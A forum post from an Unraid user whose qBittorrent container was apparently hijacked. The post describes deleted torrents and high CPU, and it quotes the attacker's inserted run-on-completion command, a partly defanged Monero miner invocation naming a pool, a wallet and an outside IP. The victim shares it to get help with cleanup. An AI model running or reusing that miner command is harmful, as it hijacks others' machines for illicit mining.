Docker container compromised - Unraid affected?


brainyyak

Recommended Posts

tower-diagnostics-20210830-1839.zipI was away from home last night, and when I came back from work today, I noticed that my CPU was nearly maxed out. This was odd, but does happen sometimes. However, I went into my torrent client (qbittorrent), and found that all of my torrents had been deleted and had been replaced with a single torrent for some kind of Italian music. qbt1.png

 

It should go without saying that I have never heard of this music nor did I seek it out. I went into my logs for qbt, and found the following:

qbt1.pngqbt2.png

 

I have no idea what those ports I circled are; I have never used them to my knowledge. I also found in my settings that some code was marked to be executed upon completion of the torrent:

/tmp/x -o pool.suppo[CODE NEUTER]rtxmr.com:443 -u 8C2GLAN7wPEDE7xAiCLYBwdPtjc3B5pWH[CODE NEUTER]44989qMTmwSjbKmm2Y1Zog9UJWchsnrkjF4qkr7CbCtUAS4QGWyxhRW7Vfg5RZ -k --tls -o 107.173.34.104:9090

The [CODE NEUTER]s were added by me to prevent any accidental activation

 

Furthermore, the logs Unraid gives me for qbt show this:

qbt3.png

 

All in all, I take this to mean that someone hijacked my system to run some kind of mining software. I can see in the logs here that the line of code to be run on completion was changed a few times, I assume this was the hacker setting up their system.

 

I've already done what I can to stop any further access and stop any illicit activity, but I'm worried about making sure there isn't any lasting damage or compromise. I am not very well versed with this stuff, so I would appreciate any suggestions.

 

I have attached my diag file

https://forums.unraid.net/applications/core/interface/file/attachment.php?id=125259&key=7d5b734ea2581f6305efd6e1c07edb66

Edited by brainyyak
Link to comment

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.